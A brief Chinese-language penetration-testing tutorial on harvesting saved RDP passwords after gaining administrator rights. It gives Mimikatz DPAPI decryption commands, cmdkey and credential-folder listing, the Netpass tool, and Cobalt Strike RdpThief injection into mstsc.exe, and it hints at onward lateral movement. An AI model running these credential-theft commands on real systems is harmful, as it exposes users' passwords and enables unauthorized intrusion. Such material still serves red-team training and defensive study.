0x00 簡介

就是利用RDP協(xié)議遠程連接其他機器的密碼。

image

0x01 獲取保存的RDP憑據(jù)

在獲取一臺機器管理員權限后，可以查看本地是否保存了 RDP 密碼，然后解密嘗試用于橫向。

查看保存的遠程主機信息（該命令需要在用戶 session 下執(zhí)行）

cmdkey /list

image

1. Mimikatz

本地的憑據(jù)

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

image

選擇一個開始進行解密，這里需要記錄 guidMasterKey

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\{用戶名}\AppData\Local\Microsoft\Credentials\{session}"

image

找到對應的 Masterkey

sekurlsa::dpapi

image

用密鑰來進行解密指定的憑據(jù)，成功解出密碼

dpapi::cred /in:C:\Users\{用戶名}\AppData\Local\Microsoft\Credentials\{session} /masterkey:{masterkey}

image

后面，懂得都懂

2. Netpass.exe

界面化工具

image

0x02 HOOK RDP 憑據(jù)

直接用工具，原理建議看 作者原文

啟動心跳檢測，檢查新的mstsc.exe進程，執(zhí)行注入操作

rdpthief_enable

image

模擬管理員進行遠程登錄

image

停止心跳檢測

rdpthief_disable

查看結果

rdpthief_dump

我的cs有點奇怪。。。。

image

還是導出來看吧，在 %temp%\data.bin 里

image.png

參考文獻

獲取rdp憑據(jù)
rdp_thief